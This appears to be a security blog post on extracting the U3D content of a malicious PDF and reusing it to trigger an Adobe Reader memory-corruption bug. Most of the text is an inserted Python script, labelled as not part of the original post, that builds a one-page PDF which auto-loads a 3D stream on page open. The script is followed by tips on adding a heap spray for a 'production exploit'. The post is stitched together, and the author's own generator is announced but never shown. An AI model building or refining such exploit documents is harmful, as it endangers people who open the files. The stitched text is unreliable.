Recycling U3D Object Contents

    by  • December 7, 2011 • Uncategorized

    This is a very short post, but I wanted to put it out there for those trying to identify the specific bug and trigger behind the exploit. My theory is that object 10 (see my earlier post) is the whole show: as long as the U3D content is in your document, it should in theory trigger the bug. I believe this because the JavaScript merely functions as a heap spray and then navigates to a specific page within the document. That page contains the annotation that references the 3D content and therefore causes it to render. Merely displaying a page does not require JavaScript.

    To recycle the content, we must first go and steal it. I took the sample I had, loaded it in peep and saved the object contents to a file. You can download the raw U3D object content from here. I then used Didier Stevens' make-pdf tool and hardcoded the values I knew needed to exist. This mainly consisted of the single page, the 3D annotation definition and the actual 3D content stream.

    I opened the output file on Windows XP SP3 running Adobe Reader 9.4.6 and got a crash (it does not bypass DEP). Obviously this is not a working exploit, but it does show that there is potential to add your own heap spray to the mix and gain execution. A few things to point out before you get too excited, though. OpenAction is not required here because we only have one page. It would be required if we included JavaScript, so a few pieces will need to be put back for a production exploit; still, I do think one page is all you need, assuming you time your spray properly with the 3D render.
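    The document layout described above, as an added example that is not part of the original post and is not the author's generator script (which is not reproduced on this page): a small Python builder for a one-page PDF whose single /3D annotation points, via /3DD, at a /U3D stream, with a /3DA activation dict set to /PO so the viewer tries to load the 3D content as soon as the page opens, with no JavaScript and no OpenAction. The object numbering, the /3DA entry and the placeholder stream bytes are assumptions; the placeholder is a constructed stub (only the U3D file-header block type, not a real model) so the script runs offline, and would be swapped for the dumped object 10 stream. The verify_pdf check exists because a hand-built file with a wrong xref offset or stream /Length fails in the parser before the 3D code is ever reached, which would be misread as "the bug did not trigger".

```python
import re

# Hypothetical generator for a minimal one-page PDF carrying a 3D annotation
# and a U3D stream. Not the author's script; the object layout is an assumption
# based on the post (one page, one /3D annotation, one /U3D stream, no
# JavaScript and no OpenAction). Object numbering is arbitrary and does not
# match "object 10" of the original sample.

# Constructed placeholder so the generator runs offline: 0x00443355 is the
# U3D file-header block type (little-endian "U3D\0"), the rest is zero
# padding, not a valid model. Replace with the dumped object 10 stream.
PLACEHOLDER_U3D = b"U3D\x00" + b"\x00" * 60


def pdf_obj(num, body):
    """Wrap a body in 'N 0 obj ... endobj'."""
    return f"{num} 0 obj\n".encode() + body + b"\nendobj\n"


def build_3d_pdf(u3d_bytes, activation=b"/PO"):
    """Return PDF bytes: catalog, page tree, one page, a /3D annotation whose
    /3DD points at the U3D stream, and a /3DA dict asking the viewer to
    activate the annotation when the page opens (/PO), so nothing but
    displaying the page is needed to make the 3D content load."""
    objs = [
        (1, b"<< /Type /Catalog /Pages 2 0 R >>"),
        (2, b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>"),
        (3, b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] "
            b"/Annots [4 0 R] >>"),
        (4, b"<< /Type /Annot /Subtype /3D /Rect [0 0 612 792] /3DD 5 0 R "
            b"/3DA << /A " + activation + b" >> >>"),
        (5, b"<< /Type /3D /Subtype /U3D /Length %d >>\nstream\n" % len(u3d_bytes)
            + u3d_bytes + b"\nendstream"),
    ]
    out = bytearray(b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n")   # binary-file marker comment
    offsets = {}
    for num, body in objs:
        offsets[num] = len(out)           # byte offset recorded in the xref table
        out += pdf_obj(num, body)
    xref_pos = len(out)
    out += b"xref\n0 %d\n" % (len(objs) + 1)
    out += b"0000000000 65535 f \n"       # entry 0 is always the free-list head
    for num in range(1, len(objs) + 1):
        out += b"%010d 00000 n \n" % offsets[num]   # 20-byte fixed-width entries
    out += (b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n"
            % (len(objs) + 1, xref_pos))
    return bytes(out)


def verify_pdf(pdf):
    """Sanity-check the file before handing it to a viewer: startxref must
    point at the xref table, every in-use entry must point at 'N 0 obj', and
    each stream's /Length must cover exactly the bytes up to 'endstream'."""
    m = re.search(rb"startxref\n(\d+)\n%%EOF", pdf)
    if not m:
        return False
    xref_pos = int(m.group(1))
    hdr = re.match(rb"xref\n0 (\d+)\n", pdf[xref_pos:])
    if not hdr:
        return False
    count, table = int(hdr.group(1)), xref_pos + hdr.end()
    for i in range(count):
        entry = pdf[table + 20 * i: table + 20 * (i + 1)]
        if len(entry) != 20:
            return False
        off, kind = int(entry[0:10]), entry[17:18]
        if i == 0:
            if kind != b"f":
                return False
        elif kind != b"n" or not pdf[off:].startswith(b"%d 0 obj" % i):
            return False
    for sm in re.finditer(rb"/Length (\d+) >>\nstream\n", pdf):
        end = sm.end() + int(sm.group(1))
        if pdf[end:end + 10] != b"\nendstream":
            return False
    return True


if __name__ == "__main__":
    doc = build_3d_pdf(PLACEHOLDER_U3D)
    assert verify_pdf(doc)
    with open("u3d_test.pdf", "wb") as f:
        f.write(doc)
```

    To test against a real sample, read the dumped object 10 stream from disk and pass those bytes to build_3d_pdf in place of PLACEHOLDER_U3D. If you later add a JavaScript spray, the catalog needs an /OpenAction (or /Names tree) entry again, and the 3D activation can be switched to /XA so the annotation only loads when you navigate to the page after the spray has run.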

    Here is the code to generate the test document I have (seriously, it’s horrible):

    Object 10 U3D decoded contents

    Sample generated document